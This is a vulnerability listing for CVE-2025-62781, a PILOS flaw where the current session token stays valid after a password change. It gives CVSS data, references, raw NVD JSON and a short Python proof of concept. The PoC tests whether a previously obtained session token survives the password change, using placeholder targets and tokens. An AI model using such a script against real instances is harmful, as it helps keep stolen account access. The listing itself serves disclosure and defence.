CVE-2025-62781

Description

PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.8.0, users with a local account can change their password while logged in. When doing so, all other active sessions are terminated, except for the currently active one. However, the current session’s token remains valid and is not refreshed. If an attacker has previously obtained this session token through another vulnerability, changing the password will not invalidate their access. As a result, the attacker can continue to act as the user even after the password has been changed. This vulnerability is fixed in 4.8.0.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:* - VULNERABLE

PILOS < 4.8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3 """ CVE-2025-62781 PoC - PILOS Session Fixation After Password Change This PoC demonstrates that session token remains valid after password change. """ import requests import json TARGET_URL = "http://target-pilos-instance.com" ATTACKER_SESSION = "attacker_obtained_session_token_here" VICTIM_USERNAME = "[email protected]" NEW_PASSWORD = "NewPassword123!" def check_session_validity(session_token): """Check if the session token is still valid after password change.""" headers = { "Cookie": f"session={session_token}", "Content-Type": "application/json" } response = requests.get( f"{TARGET_URL}/api/v2/users/me", headers=headers ) return response.status_code == 200 def change_password(session_token, new_password): """Simulate victim changing their password.""" headers = { "Cookie": f"session={session_token}", "Content-Type": "application/json" } data = { "current_password": "OldPassword123!", "password": new_password, "password_confirmation": new_password } response = requests.post( f"{TARGET_URL}/api/v2/users/password", headers=headers, json=data ) return response.status_code == 200 def main(): print("[*] CVE-2025-62781 - PILOS Session Fixation Test") print(f"[*] Target: {TARGET_URL}") # Step 1: Attacker obtains session token (via XSS, MITM, etc.) print(f"[*] Attacker has session token: {ATTACKER_SESSION[:20]}...") # Step 2: Verify session is valid before password change print("[*] Checking session validity before password change...") if check_session_validity(ATTACKER_SESSION): print("[+] Session is valid") else: print("[-] Session is invalid") return # Step 3: Victim changes password print("[*] Victim changes password...") if change_password(ATTACKER_SESSION, NEW_PASSWORD): print("[+] Password changed successfully") # Step 4: Verify session is still valid (VULNERABILITY) print("[*] Checking session validity after password change...") if check_session_validity(ATTACKER_SESSION): print("[!] VULNERABLE: Session still valid after password change!") print("[!] Attacker can continue to impersonate victim") else: print("[+] PATCHED: Session invalidated after password change") if __name__ == "__main__": main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62781
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62781
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62781/
[4] VulDB https://vuldb.com/cve/CVE-2025-62781
[5] https://github.com/THM-Health/PILOS/security/advisories/GHSA-m8w5-8w3h-72wm

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62781", "sourceIdentifier": "[email protected]", "published": "2025-10-27T22:15:42.153", "lastModified": "2025-11-04T18:37:22.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PILOS (Platform for Interactive Live-Online Seminars) is a frontend for BigBlueButton. Prior to 4.8.0, users with a local account can change their password while logged in. When doing so, all other active sessions are terminated, except for the currently active one. However, the current session’s token remains valid and is not refreshed. If an attacker has previously obtained this session token through another vulnerability, changing the password will not invalidate their access. As a result, the attacker can continue to act as the user even after the password has been changed. This vulnerability is fixed in 4.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 3.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thm:pilos:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.0", "matchCriteriaId": "91445D94-4D77-4EFF-A078-6AEF72F6E116"}]}]}], "references": [{"url": "https://github.com/THM-Health/PILOS/security/advisories/GHSA-m8w5-8w3h-72wm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}